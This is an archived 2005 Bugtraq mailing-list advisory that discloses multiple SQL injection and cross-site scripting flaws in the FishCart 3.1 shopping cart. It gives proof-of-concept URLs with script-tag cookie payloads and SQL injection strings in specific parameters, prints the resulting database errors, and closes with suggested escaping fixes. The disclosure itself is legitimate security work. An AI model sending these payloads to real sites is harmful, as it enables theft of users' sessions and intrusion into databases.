lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 4 May 2005 03:10:28 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL injections and XSS in FishCart 3.1




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!!
http://www.digitalparadox.org/services.ah

Looking for Publishers intrested in my Php Secure Coding Book.

Severity: High
Title: Multiple SQL injections and XSS in FishCart 3.1
Date: 4/05/2005

Vendor: FishNet Inc
Vendor Website: http://www.fishnetinc.com
Summary: There are, multiple sql injections and xss in fishcart 3.1.


Proof of Concept Exploits:

http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&olimit=0&cat=&key1=&psku=
XSS

http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
SQL INJECTION

Database error: Invalid SQL: select count(*) as cnt from
cvsdemo31prod,cvsdemo31prodlang where nzid=1 and nprodsku=prodsku and
prodzid=1 and nprodsku=prodlsku and prodlzid=1 and
prodlid=1prodsku='''SQL_INJECTION' and prodlsku='''SQL_INJECTION' and
prodzid=1 and prodzid=prodlzid and prodlid=1 and (produseinvq=0 or
(produseinvq=1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column 'nzid' in 'where clause')
Session halted.


http://example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION
SQL INJECTION

Database error: Invalid SQL: select sku,qty from cvsdemo31oline where
orderid=''SQL_INJECTION'
MySQL Error: 1064 (You have an error in your SQL syntax near
'SQL_INJECTION'' at line 1)
Session halted.

http://example.com/demo31/upstracking.php?trackingnum='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&reqagree=checked&m=
XSS


http://example.com/demo31/upstracking.php?trackingnum=&reqagree='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&m=
XSS

http://example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(),
mysql_real_escape_string() and other functions for input validation before
passing user input to the mysql database, or before echoing data on the
screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to
contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/.


Powered by blists - more mailing lists